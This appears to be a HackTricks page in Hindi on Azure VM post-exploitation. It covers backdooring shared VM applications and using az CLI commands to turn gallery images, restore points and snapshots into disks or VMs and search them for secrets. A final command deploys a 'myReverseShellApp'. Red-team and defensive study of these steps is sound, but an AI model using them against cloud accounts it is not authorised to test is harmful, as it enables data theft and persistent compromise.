Az - VMs & Network Post Exploitation
Reading time: 6 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।
VMs & Network
Azure VMs और नेटवर्किंग के बारे में अधिक जानकारी के लिए निम्नलिखित पृष्ठ देखें:
Az - Virtual Machines & Network
VM Application Pivoting
VM एप्लिकेशन अन्य सब्सक्रिप्शन और टेनेंट के साथ साझा किए जा सकते हैं। यदि कोई एप्लिकेशन साझा किया जा रहा है, तो शायद इसका उपयोग किया जा रहा है। इसलिए यदि हमलावर एप्लिकेशन को समझौता करता है और एक बैकडोर संस्करण अपलोड करता है, तो यह संभव है कि इसे दूसरे टेनेंट या सब्सक्रिप्शन में निष्पादित किया जाएगा।
Sensitive information in images
यह संभव है कि अतीत में VMs से ली गई छवियों के अंदर संवेदनशील जानकारी मिल सके।
- गैलरी से छवियों की सूची
# Get galleries
az sig list -o table
# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
- कस्टम इमेज़ की सूची बनाएं
az image list -o table
- इमेज आईडी से VM बनाएं और इसके अंदर संवेदनशील जानकारी के लिए खोजें
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
पुनर्स्थापना बिंदुओं में संवेदनशील जानकारी
यह संभव है कि पुनर्स्थापना बिंदुओं के अंदर संवेदनशील जानकारी मिल सके।
- पुनर्स्थापना बिंदुओं की सूची बनाएं
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
- एक डिस्क बनाएं एक पुनर्स्थापना बिंदु से
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
- एक VM से डिस्क को संलग्न करें (हमलावर को पहले से ही खाते के अंदर एक VM को समझौता करना होगा)
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
- डिस्क को माउंट करें और संवेदनशील जानकारी के लिए खोजें
# List all available disks
sudo fdisk -l
# Check disk format
sudo file -s /dev/sdX
# Mount it
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk
डिस्क और स्नैपशॉट में संवेदनशील जानकारी
यह संभव है कि डिस्क या यहां तक कि पुराने डिस्क के स्नैपशॉट में संवेदनशील जानकारी मिल सके।
- स्नैपशॉट की सूची
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
- Snapshot से डिस्क बनाएं (यदि आवश्यक हो)
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
- डिस्क को एक VM से जोड़ें और माउंट करें और संवेदनशील जानकारी के लिए खोजें (यह करने के लिए पिछले अनुभाग को देखें)
VM एक्सटेंशन और VM एप्लिकेशन में संवेदनशील जानकारी
यह संभव है कि VM एक्सटेंशन और VM एप्लिकेशन के अंदर संवेदनशील जानकारी मिल सके।
- सभी VM ऐप्स की सूची बनाएं
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
- एक VM में एक्सटेंशन इंस्टॉल करें और संवेदनशील जानकारी के लिए खोजें
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।